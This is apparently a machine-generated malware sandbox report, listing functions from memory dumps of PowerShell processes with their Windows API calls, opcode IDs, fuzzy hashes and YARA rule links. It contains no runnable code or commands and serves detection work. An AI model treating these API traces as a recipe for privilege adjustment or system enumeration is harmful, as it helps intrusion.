                                                        • Instruction ID: 2b283a71bfb59daee415a66ce4d23acfd58905d00fc28adbf386162d6a9e9ce1
                                                        • Opcode Fuzzy Hash: 5ea7d996aac74b274a1a8e590bbdba23e161a39ebf981ce35bfb9e681cfc58b2
                                                        • Instruction Fuzzy Hash: CF117CB66003049FEB20DF29DC85B56FBD8EB14221F08846EDE49CB242D670E504CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01DFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 2eeb6836701e774e89e2d49ccac4fceec017ba267ffc9820198d4568a38cf1c0
                                                        • Instruction ID: 0cd4dd4dd69993100e8d656a1aa612e760b84a79135f9ff279c3e1aeea2aa2f3
                                                        • Opcode Fuzzy Hash: 2eeb6836701e774e89e2d49ccac4fceec017ba267ffc9820198d4568a38cf1c0
                                                        • Instruction Fuzzy Hash: 4911C17540D7C09FD7128B15DC85A92BFA4EF07224F0A80DBDD848F163D268A909C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B028BEA,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 0c0b6f92090c0e30ca42e02eee49980ea567d605a34e131ea68e132c26eda4ca
                                                        • Instruction ID: 576eacca81cb14e18f1261350b56a58db918fdf8df4103f1d84a1d0ee07a9163
                                                        • Opcode Fuzzy Hash: 0c0b6f92090c0e30ca42e02eee49980ea567d605a34e131ea68e132c26eda4ca
                                                        • Instruction Fuzzy Hash: F1018079500708EFFB209F15DD85FA7FB98DF45721F14809AEE099A241DA74A904CAB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 26ab692f2f512603ce484fd30fdf1ce50efce8c47196b1d1372f7a07747a402a
                                                        • Instruction ID: 244bdd6f87e89c458b7e8284ae48d00eabc280fdddbe9a7e56ddb4b535c6097e
                                                        • Opcode Fuzzy Hash: 26ab692f2f512603ce484fd30fdf1ce50efce8c47196b1d1372f7a07747a402a
                                                        • Instruction Fuzzy Hash: D711CE7A500704DFEB20CF15DC89B66FBA4EF04620F08C4AADC09CB611D735E448CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01DFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 403db4d6e5537b0cfacbfd6c205e00b1fb1bead68d0b56ed2444f22993568918
                                                        • Instruction ID: a117e482dd575836ffc8bf3589c08dc33ccd555c1b7f3611af5d2467d16c9ea6
                                                        • Opcode Fuzzy Hash: 403db4d6e5537b0cfacbfd6c205e00b1fb1bead68d0b56ed2444f22993568918
                                                        • Instruction Fuzzy Hash: C611C2B54093809FDB11CF55DC85B82BFA4EF42220F0AC0ABDD488F153D274A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 9f23523cb4c65bc2ec62a1d4721d0a9c834a0299fff3c6afdb729a70cb594144
                                                        • Instruction ID: 0ae1abee9e766ad3d1d3eff6d12c71e7d6e3f5da5877035baca9f3eaadba597b
                                                        • Opcode Fuzzy Hash: 9f23523cb4c65bc2ec62a1d4721d0a9c834a0299fff3c6afdb729a70cb594144
                                                        • Instruction Fuzzy Hash: 91118E72500700DFEB21CF55DC45B52FFE4EF18211F0884AEDE898A612D371E518DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: de51fb1141aff10a9a4ba59b0fef464f7ec8a3468461a79525c960319e41b412
                                                        • Instruction ID: 0135dc31afd15ee67f741334c224aee2de0cef132c67b65c71fff15916b35a8a
                                                        • Opcode Fuzzy Hash: de51fb1141aff10a9a4ba59b0fef464f7ec8a3468461a79525c960319e41b412
                                                        • Instruction Fuzzy Hash: 13019E79604348CFEB14DF25DC857A6FBA8DF01225F08C4AADE09CB642EB74E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 9ae414278d5c539fe650478d1061f9b03b80bc72272b509357bbd34e170f8eb7
                                                        • Instruction ID: b62daf1e71972d8513e357a303eda53abe3c1237fc3e4ba53d5461122765537e
                                                        • Opcode Fuzzy Hash: 9ae414278d5c539fe650478d1061f9b03b80bc72272b509357bbd34e170f8eb7
                                                        • Instruction Fuzzy Hash: 75017175900600AFE310DF16DC46B66FBA8FB84A20F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: b29fe05114220fd160884dccafe7d9acb7174076104b5ec5c813fe0ddec0704e
                                                        • Instruction ID: 629dc280de92a61b98f958ad1d7a79885ffb11e054cd70176fc6fef254bc1b20
                                                        • Opcode Fuzzy Hash: b29fe05114220fd160884dccafe7d9acb7174076104b5ec5c813fe0ddec0704e
                                                        • Instruction Fuzzy Hash: 07017175900600AFE310DF16DC46B66FBA8FB84A20F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: fd5d10e7b261f01b3073090b2b96c6b63f15ad5ef709e6f459869643fc024b73
                                                        • Instruction ID: 6a87f852ab360208328b1e7ffbb52f1fe567adfb8672ec565dbcf9c5ea2dbc59
                                                        • Opcode Fuzzy Hash: fd5d10e7b261f01b3073090b2b96c6b63f15ad5ef709e6f459869643fc024b73
                                                        • Instruction Fuzzy Hash: FC01BC79504304DFEF209F15DC89BA5FBA4EF05624F08C4AADC09CB642D679A444CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 61769e351ca8ef0f90d8324e63358221cc203d878b1861ec93407fda8593f05e
                                                        • Instruction ID: 91d8552f9de4130a5a2379fb1b4a26867950e49375c308d0c1a2800a123cbaf0
                                                        • Opcode Fuzzy Hash: 61769e351ca8ef0f90d8324e63358221cc203d878b1861ec93407fda8593f05e
                                                        • Instruction Fuzzy Hash: B001DF75500304DFEB21CF19DC85BA5FBA4EF05621F08C4AFDE498B256D275E904CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 0243d4d76db054490e1504edffce44c8f41bef04095be29f945d9ec241fa22d6
                                                        • Instruction ID: eefe17db209b0f423ae87d8a81baef4163c54fa4c88dc90b2d96c491ccc5c43d
                                                        • Opcode Fuzzy Hash: 0243d4d76db054490e1504edffce44c8f41bef04095be29f945d9ec241fa22d6
                                                        • Instruction Fuzzy Hash: B5016275900600ABD314DF16DC46B26FBA8FB89B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 4c38a78f8aa4792ba7ceb830ee17f3be668b7ed0a01e576b5d60254c4349749d
                                                        • Instruction ID: d66b1c002601a47ed9b7ad5f9d090b73337a8b46f6bcd46d7a5ead1dfc2151ef
                                                        • Opcode Fuzzy Hash: 4c38a78f8aa4792ba7ceb830ee17f3be668b7ed0a01e576b5d60254c4349749d
                                                        • Instruction Fuzzy Hash: A1017C79504348DFEB10DF15D885B66FB94EF00624F08C5AADD08CF686E778E408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: f655413e5846fda2b666ad5dae28f4dc25227af5b6bc9296b0e5eff9cbe20533
                                                        • Instruction ID: f88e290e48ff0dd5e932df4a5a9c1e65cc0c50168afafb881777da92e6296c32
                                                        • Opcode Fuzzy Hash: f655413e5846fda2b666ad5dae28f4dc25227af5b6bc9296b0e5eff9cbe20533
                                                        • Instruction Fuzzy Hash: 26016275900600ABD314DF16DC46B26FBA8FB89B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 17097d18b259d21cff03edbac13c2d20301c7d9f6aba29f536cb25df262a07c7
                                                        • Instruction ID: f05a03f795ef5ea3d451204cb4216c0448a2ab1966bb33cfc4e994a2537a6a8f
                                                        • Opcode Fuzzy Hash: 17097d18b259d21cff03edbac13c2d20301c7d9f6aba29f536cb25df262a07c7
                                                        • Instruction Fuzzy Hash: 9301F47D500708DFEB148F15D885B62FBA4EF41625F08C0AADD0A8B752D774E408DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01DFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: cb209c0e3a268b490963dab957c41d089237ed5de3c915c0024b5b1f020c83b9
                                                        • Instruction ID: 9414aff44eafed2c391606dfcba39b64c730c7e3562b2761e5f9fea849a83abd
                                                        • Opcode Fuzzy Hash: cb209c0e3a268b490963dab957c41d089237ed5de3c915c0024b5b1f020c83b9
                                                        • Instruction Fuzzy Hash: E601DC79404344CFEB10DF59D889BA1FBA4EF04220F49C4AACE0C8F206D274A504CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02841116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: d96baaafe028c12182204e78ede5b6327039ec9cdd11654019c6c395975da922
                                                        • Instruction ID: 479b964ef88e20119fbc5b5745a5fac11d8ca4367e942e0bdb09dd55769a24ee
                                                        • Opcode Fuzzy Hash: d96baaafe028c12182204e78ede5b6327039ec9cdd11654019c6c395975da922
                                                        • Instruction Fuzzy Hash: CAF0223D500748DFEB20CF05DC89B65FBA4EF01A21F08C0DACC0D8B312DA75A488CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2108123811.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 0a74f147d78fb82c3fb1a9b6d4c9d0f8bd9a0ba9e6bfeb33ba20e2babd92b271
                                                        • Instruction ID: 7888ae545335f26a0d79d69a98c6d0a12d139347bf9ffbe821385a8cd44d764e
                                                        • Opcode Fuzzy Hash: 0a74f147d78fb82c3fb1a9b6d4c9d0f8bd9a0ba9e6bfeb33ba20e2babd92b271
                                                        • Instruction Fuzzy Hash: AFF0C23D504748DFEB20DF15D889B66FFA0EF15726F08C09ADE498B316D775A408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 8fea6efb00d7c3b3653cadc5ee0dec95cb16f519c44227ef6663cbb7a81f3110
                                                        • Instruction ID: bbfc7b3dace462f6bdeed4cfed31472d615ddcb94089fbf54791bf8e5f74176a
                                                        • Opcode Fuzzy Hash: 8fea6efb00d7c3b3653cadc5ee0dec95cb16f519c44227ef6663cbb7a81f3110
                                                        • Instruction Fuzzy Hash: C4F0AF39504740DFEB219F45D885B65FBE0EF05621F08C09ADE4D4B312D3B5E508CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01DFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 3281545bc4601b973423cf48495d35af23d9880cd9a278f20eeacbade2936846
                                                        • Instruction ID: 7ffcf702c00067a300ef68fe73987fb397a92c29e17e0db716ab5f4d9f5031dc
                                                        • Opcode Fuzzy Hash: 3281545bc4601b973423cf48495d35af23d9880cd9a278f20eeacbade2936846
                                                        • Instruction Fuzzy Hash: 28F0CD35504744CFEB11CF09D989762FBA0EF09625F48C09ADE4D4F342D278E60CCAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01DFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: b6b0be4c6e318d700720504d8f78c6f3dc1defdf30b1c7f67a3a5f0dba85fb51
                                                        • Instruction ID: 26b6a79ce213e318e80d1f3d6186c3b654120ce5c9f93fcac2b5eabf4ef594d4
                                                        • Opcode Fuzzy Hash: b6b0be4c6e318d700720504d8f78c6f3dc1defdf30b1c7f67a3a5f0dba85fb51
                                                        • Instruction Fuzzy Hash: A011A3755093809FD712CF25DC45B92FFA4EF46220F0980EFED498B253D275A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01DFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 52439562c473d71a843e53a3059888c27e65f49590f14021e75519f7c695a7da
                                                        • Instruction ID: a3a50e132ed8f8917458b1f059a88b1c60a8ec699b8f21de4f72073f3b9e0360
                                                        • Opcode Fuzzy Hash: 52439562c473d71a843e53a3059888c27e65f49590f14021e75519f7c695a7da
                                                        • Instruction Fuzzy Hash: F501DF75500740DFEB11DF19D8857A6FB94EF04220F48C0AEDD098B242D275E908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02B207F7, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2109983688.0000000002B20000.00000040.00000040.sdmp, Offset: 02B20000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b327a37b5919de901af85854d8dd5a7dc84b2c727f946568e07284b587555156
                                                        • Instruction ID: 35d32051f2508e51e4824ebc97fbb1ea58c5c69296dc535f2eaddb95c46ba23e
                                                        • Opcode Fuzzy Hash: b327a37b5919de901af85854d8dd5a7dc84b2c727f946568e07284b587555156
                                                        • Instruction Fuzzy Hash: 5301A776509380AFD7128B159C51C62FFB8DE86630749C49FEC498B612D1296819CB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02BD0860, Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2110522426.0000000002BD0000.00000040.00000001.sdmp, Offset: 02BD0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2639d08fe46e9c0b3c9e64279293d849126d9a09fea67e882bf7429338b3bf5e
                                                        • Instruction ID: 6b6c0aebd0bd1341326fbd4fd8ffaaf519252878b5310af3e1f02afe1ef18c55
                                                        • Opcode Fuzzy Hash: 2639d08fe46e9c0b3c9e64279293d849126d9a09fea67e882bf7429338b3bf5e
                                                        • Instruction Fuzzy Hash: 95E06D2120E3D15FC3134B24A8A5495BF729E8711471E81DBD582CF257DA58484AD372
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02B2081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2109983688.0000000002B20000.00000040.00000040.sdmp, Offset: 02B20000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e4f8638c1dbe0ffeeeb1b6b713fbde9d40cdff8e601d28e0e43ac3e814a5898
                                                        • Instruction ID: 07c678183420da15abdd5c46d0f1e71fbf09ee9d34848d3baf413870db1081c9
                                                        • Opcode Fuzzy Hash: 1e4f8638c1dbe0ffeeeb1b6b713fbde9d40cdff8e601d28e0e43ac3e814a5898
                                                        • Instruction Fuzzy Hash: 28E092B66047009BD750DF0AEC41852F7D8EB84A30B58C07FDC0D8B700E135B508CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DF23F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103102277.0000000001DF2000.00000040.00000001.sdmp, Offset: 01DF2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f4807e1a5f2889cf2d66aab22958ae39b15f851dafe0e74f381bbdc6be76156
                                                        • Instruction ID: cfdc5290441dd74d7547857fc1114fa73cc0453830458ed3515eed4c75698ae5
                                                        • Opcode Fuzzy Hash: 0f4807e1a5f2889cf2d66aab22958ae39b15f851dafe0e74f381bbdc6be76156
                                                        • Instruction Fuzzy Hash: 88D05E79204A819FE7178A1CC1A5B953BA4AF69B04F4744FEE940CB6A3C7A8E681D210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DF23BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103102277.0000000001DF2000.00000040.00000001.sdmp, Offset: 01DF2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70993aec9c80577166e7c0dfe67cf33e3c090a04f51a7d3bfb89d7cfc7f720e1
                                                        • Instruction ID: a584b10623e8cc2c05d3a961a47a67796c1a40afd2bd96085da5fbc70be4de5d
                                                        • Opcode Fuzzy Hash: 70993aec9c80577166e7c0dfe67cf33e3c090a04f51a7d3bfb89d7cfc7f720e1
                                                        • Instruction Fuzzy Hash: 6AD05E743006818FEB15CB1CC194F5977E4AF44700F0644ECBD008B666C3A5E980C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2172 Parent PID: 2692 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01EDACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01EDAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: fe19d1563357d2a9a749102e1a77a9bbb9fa59dace77de805cb55a2b19203fbc
                                                        • Instruction ID: a70cc1abcf584b0fb4730d23c81e5b9669d561efd46c4297a060080562ce83ba
                                                        • Opcode Fuzzy Hash: fe19d1563357d2a9a749102e1a77a9bbb9fa59dace77de805cb55a2b19203fbc
                                                        • Instruction Fuzzy Hash: 6E21D3765097809FEB238F25DC44B92BFF4EF06314F0884EAE9858B163D231D908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01EDAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 11f43ff55163eecc7476548d22e6e693ae2abca783e6b8353b640047dc927dc9
                                                        • Instruction ID: 3005810101c1ca759c53a2d5cc3176575f91f99ae8c761227edea3d06848d8ea
                                                        • Opcode Fuzzy Hash: 11f43ff55163eecc7476548d22e6e693ae2abca783e6b8353b640047dc927dc9
                                                        • Instruction Fuzzy Hash: 1511CE76500700DFEB21CF55DC84BAAFBE4EF48225F08C4AAED4A8B662D331E514DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01EDB329
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 5764b35c9c538d00dc5060a450f11fe230a48eb6b3370219a35a5fc846823653
                                                        • Instruction ID: c93c7d6a14e0fd8d69f8de1d6be92455e4f897bc2afc56a50540f9dd7c14b938
                                                        • Opcode Fuzzy Hash: 5764b35c9c538d00dc5060a450f11fe230a48eb6b3370219a35a5fc846823653
                                                        • Instruction Fuzzy Hash: B811C271508380AFDB228F15DC45F52FFB4EF06224F09C49EED844B663D275A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01EDB329
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 44efed1a9b4d0067bb9a88db4af54649721b05b59fabbb926033f12ce1a0dc9e
                                                        • Instruction ID: 273068dd817aee16210d08ee5ac46951d0db09eb262fefe6e6335847dbb8c6ba
                                                        • Opcode Fuzzy Hash: 44efed1a9b4d0067bb9a88db4af54649721b05b59fabbb926033f12ce1a0dc9e
                                                        • Instruction Fuzzy Hash: DD01AD32500700DFEB218F49D885B66FBA0EF09720F08C09ADD890B612E6B1A419EB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
